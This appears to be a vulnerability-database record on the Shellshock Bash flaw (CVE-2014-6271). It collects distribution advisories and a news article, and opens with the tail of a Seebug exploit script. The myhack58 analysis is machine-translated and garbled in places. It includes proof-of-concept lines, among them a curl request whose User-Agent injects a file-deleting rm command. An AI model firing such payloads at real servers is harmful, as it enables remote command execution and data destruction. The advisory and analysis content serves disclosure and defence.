\r\nprint(banner)\r\n \r\nurl = checkurl(options.target)\r\ncmd = options.cmd\r\nuser = options.user\r\npwd = options.pwd\r\n \r\nconnectionScan(url,user,pwd,cmd)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87294", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-11-08T20:49:38", "bulletinFamily": "info", "description": "Author: yaoxi\n\nDocumentation \nThis time, we combined The poc analysis to know about the Bash syntax rules, from another angle to help everyone better understand the bash and the shellshock vulnerability.\n\nVulnerability description \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271> \nCVE-2 0 1 4-6 2 7 1 vulnerability is St\u00e9phane Hassles France found the SHELL of a vulnerability to the environment variable values within the function definition after adding the extra string will trigger this vulnerability, an attacker can exploit this vulnerability to change or bypass environment restrictions to execute shell commands. \nThis vulnerability may affect to use the ForceCommand feature in OpenSSH sshd, use mod_cgi or mod_cgid Apache server, DHCP client, and the other using bash as the interpreter of the application.\n\nVulnerability testing \nA local test \n# env x=\u2019() { :;}; echo vulnerable\u2019 bash-c \u201cecho this is a test\u201d \nPrint out: \nvulnerable \nthis is a test\n\nSecond, the http via cgi test \nConstructed poc. cgi \n! [](/Article/UploadPic/2014-9/2 0 1 4 9 2 8 2 1 1 4 0 2 0 0. png) \nMake sure that the local www directory there is a test. file file \n# curl http://127.0.0.1/poc.cgi -A \u2018x=() { :; }; /bin/rm /www/test. file\u2019 \ntest. the file has been deleted\n\n# curl http://192.168.0.1/test.file \n<! DOCTYPE HTML PUBLIC \u201c-//IETF//DTD HTML 2.0//EN\u201d> \n<html><head> \n<title>4 0 4 Not Found</title> \n</head><body> \n... \n</body> \n</html>\n\nVulnerability analysis \nIn the above test, the User-agent input\u201cx=() { :; }; /bin/rm /www/test. file\u201dbash syntax analysis parsing into a function definition and a command. And in parse_and_execute function command is executed, resulting in the test. file was illegally removed. \nThe following analysis is mainly to see the bash syntax what is the\u201dHTTP_USER_AGENT() { :; };\\n/bin/rm /www/test. file\u201dcharacter input is parsed into a function definition and a command of the process. Understand the bash syntax parsing process that can help us to better understand the vulnerability details.\n\nA Bash of the lexical and syntax analysis is to use flex and yacc to achieve. About flex and yacc, and do not understand the can yourself go to query related information. Here a brief introduction about it: \nFlex lexical analyzer of the data stream of all kinds of words to extract out, forming a token for the parser using the Yacc grammar Analyzer the grammar symbols according to certain rules to move into-Statute of operation, the final reduction of the target S grammar\n\nSecond, Bash the lexical token in y. tab. c can be found, word_token_alist and other_token_alist, etc. in the array definition. Bash syntax is defined in parse. y defined in the file. \nThe analysis of the input data:\u201dHTTP_USER_AGENT() \\n{\\n :;\\n };/bin/rm /www/test. file\u201d \n! [](/Article/UploadPic/2014-9/2 0 1 4 9 2 8 2 1 1 4 0 9 4 0. png) \nIn Statute to function_def state when you create the function definition, as follows interface: \n{ $$ = make_function_def ($1, $5, function_dstart, function_bstart); } \nThe corresponding$1= HTTP_USER_AGENT, $5 value as a function of the body, function_dstart as a function of the defined start line, \nfunction_bstart for the body of the function define the start line. \n/bin/rm /www/test. the file is in simple_command: the state of time, create a command, call the interface: \nCOMMAND *make_simple_command (element, command)\n\nThird, in parse_and_execute function of the Central decomposition analysis of the work by yyparse complete it in parse_command is called. \n\n\n**[1] [[2]](<54165_2.htm>) [next](<54165_2.htm>)**\n", "modified": "2014-09-28T00:00:00", "published": "2014-09-28T00:00:00", "id": "MYHACK58:62201454165", "href": "http://www.myhack58.com/Article/html/3/62/2014/54165.htm", "type": "myhack58", "title": "From the parsing perspective analysis of the Shellshock Vulnerability[CVE-2 0 1 4-6 2 7 1]-vulnerability warning-the black bar safety net", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:41:25", "bulletinFamily": "unix", "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nShift_JIS, also known as \"SJIS\", is a character encoding for the Japanese\nlanguage. This package provides bash support for the Shift_JIS encoding.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll users who require Shift_JIS encoding support with Bash built-in\nfunctions are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\n", "modified": "2018-06-13T01:27:57", "published": "2014-09-24T04:00:00", "id": "RHSA-2014:1295", "href": "https://access.redhat.com/errata/RHSA-2014:1295", "type": "redhat", "title": "(RHSA-2014:1295) Critical: bash Shift_JIS security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:46:21", "bulletinFamily": "unix", "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:55:46", "published": "2014-09-24T04:00:00", "id": "RHSA-2014:1294", "href": "https://access.redhat.com/errata/RHSA-2014:1294", "type": "redhat", "title": "(RHSA-2014:1294) Critical: bash security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:43:10", "bulletinFamily": "unix", "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:22", "published": "2014-09-24T04:00:00", "id": "RHSA-2014:1293", "href": "https://access.redhat.com/errata/RHSA-2014:1293", "type": "redhat", "title": "(RHSA-2014:1293) Critical: bash security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:54", "bulletinFamily": "unix", "description": "### Background\n\nBash is the standard GNU Bourne Again SHell. \n\n### Description\n\nStephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code. \n\n### Impact\n\nA remote attacker could exploit this vulnerability to execute arbitrary commands even in restricted environments. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Bash 3.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-3.1_p18:3.1\"\n \n\nAll Bash 3.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-3.2_p52:3.2\"\n \n\nAll Bash 4.0 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.0_p39:4.0\"\n \n\nAll Bash 4.1 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.1_p12:4.1\"\n \n\nAll Bash 4.2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-shells/bash-4.2_p48\"", "modified": "2014-10-04T00:00:00", "published": "2014-09-24T00:00:00", "id": "GLSA-201409-09", "href": "https://security.gentoo.org/glsa/201409-09", "type": "gentoo", "title": "Bash: Code Injection", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:05", "bulletinFamily": "info", "description": "While the most urgent focus where the [Bash vulnerability](<http://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521>) is concerned is around Internet-facing web servers, embedded systems and industrial control systems are not exempt from worry.\n\nExperts are concerned about Linux-based industrial control systems and SCADA equipment, in particular, that may be affected and difficult to patch.\n\n\u201cSome gear isn\u2019t even designed to be upgraded. There is a lot of ICS equipment still being produced today that has no firmware update mechanism,\u201d said K. Reid Wightman director of Digital Bond Labs. \u201cSome gear is end of life, and vendors may not produce a patch. ICS and SCADA equipment tend to be in use for 10 or more years before the equipment gets an upgrade. Many vendors stop producing patches before the 10 year upgrade cycle is complete.\u201d\n\nDowntime is also a patching barrier in some cases\u2014often an unacceptable circumstance.\n\n\u201cDowntime is a huge issue,\u201d Wightman said. \u201cThese systems can only be patched during an industrial control system\u2019s maintenance window. This might only roll around once per year (and maybe even longer), depending on the control system.\u201d\n\nThose patching challenges may exacerbate what is already a perplexing set of circumstances around the latest Internet-wide bug. The [Bash vulnerability](<http://securelist.com/blog/research/66673/bash-cve-2014-6271-vulnerability-qa-2/>) was disclosed yesterday by Stephane Chazelas, and immediately Linux distributions went to work on distributing patches to curb the effect of the bug which could allow an attacker to remotely attach executable code to an environment variable that would be executed when Bash is invoked. Reports this morning that the [first patches were incomplete](<http://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550>) were met by equally disturbing reports of [active exploits that could lead to a worm or a DDoS botnet](<http://threatpost.com/bash-exploit-reported-first-round-of-patches-incomplete/108550>).\n\nWhile Apache servers using CGI scripts, or some Git deployments running over SSH, are likely most at risk, Wightman said the Bash shell is widespread in ICS and SCADA gear as well as embedded devices.\n\n\u201cMany industrial components run Linux and use bash in a way that will be exploitable,\u201d Wightman said. \u201cIndustrially hardened network switches, and even some programmable logic controllers (PLCs) and remote terminal units (RTUs) will likely be affected.\u201d\n\nWightman offered some specific examples that include RuggedCom\u2019s managed Ethernet switch line, EtherTrak\u2019s managed Ethernet switch line, Wago PLCs, and Schweitzer Engineering RTUs that run Linux.\n\n\u201cThere\u2019s a long list of potentially affected devices that are used in ICS/SCADA,\u201d he said.\n\nWhile most ICS gear and SCADA equipment should not be Internet-facing, something that should curtail the impact of Bash in those environments, experts caution that isn\u2019t always the case.\n\n\u201cThe vulnerability is identical in IT/OT, however, a disproportionate number of \u2018simple\u2019 embedded devices uses CGI + Bash as compared to more modern web frameworks,\u201d said Adam Crain, security researcher and founder of Automatak. \u201cBash is the most common shell used on Linux systems. A large fraction of embedded devices in ICS/SCADA are Linux based. Not all of these systems are vulnerable because not all of them expose a service that can be used to exploit the bash vulnerability.\u201d\n\nIt\u2019s important that engineers examine their assets to determine which components may be making use of Bash, some of which are likely hidden.\n\n\u201cUnless an end user spends the time to reverse engineer the industrial gear, they really have no idea if and how bash may be called by services on the system,\u201d Wightman said. \u201cWe have even encountered equipment which runs GNU/Linux and Bash, but fails to disclose this to their customers (which is actually a contractual requirement, since they are making use of software that is licensed under the GNU public license).\u201d\n", "modified": "2014-09-26T16:21:06", "published": "2014-09-25T14:34:38", "id": "THREATPOST:87BEB3651A26414841F6C10CC8797A19", "href": "https://threatpost.com/patching-bash-vulnerability-a-challenge-for-ics-scada/108575/", "type": "threatpost", "title": "Patching Bash Vulnerability a Challenge for ICS, SCADA", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:55", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:1293\n\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/020582.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/020583.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/020585.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-September/020650.html\n\n**Affected packages:**\nbash\nbash-doc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-1293.html", "modified": "2014-09-30T11:23:08", "published": "2014-09-24T15:07:20", "href": "http://lists.centos.org/pipermail/centos-announce/2014-September/020582.html", "id": "CESA-2014:1293", "title": "bash security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}